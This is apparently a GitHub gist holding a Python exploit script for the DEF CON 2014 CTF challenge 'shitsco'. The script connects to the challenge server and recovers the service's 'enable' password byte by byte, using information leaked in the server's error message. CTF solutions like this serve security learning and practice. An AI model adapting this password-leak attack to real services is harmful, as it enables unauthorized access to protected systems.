DEFCON 2014 Writeup shitsco
| from struct import pack | |
| from socket import * | |
| from pwn import process | |
| #p = process("shit") | |
| p = socket(AF_INET, SOCK_STREAM) | |
| p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337)) | |
| print p.recv(4096) | |
| current = [ord(i) for i in ""] #[1] * 31 #list | |
| pos = len(current) | |
| current += [1] * (32 - len(current)) | |
| blacklist = [10, 32] | |
| while pos < 32: | |
| string = "".join(chr(i) for i in current) | |
| p.send("enable " + string + "\n") | |
| s = "" | |
| while not "The password" in s: | |
| s += p.recv(4096) | |
| print [s] | |
| ret = ord(s.split("The password isn't ")[1][32]) | |
| current[pos] += ret | |
| pos += 1 | |
| #if ret == '\x01': | |
| # current[pos] += 1 | |
| # if current[pos] in blacklist: | |
| # current[pos] += 1 | |
| #elif ret == '\xff' : | |
| # current[pos] -= 1 | |
| # pos += 1 | |
| print current | |
| #current[pos] += 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment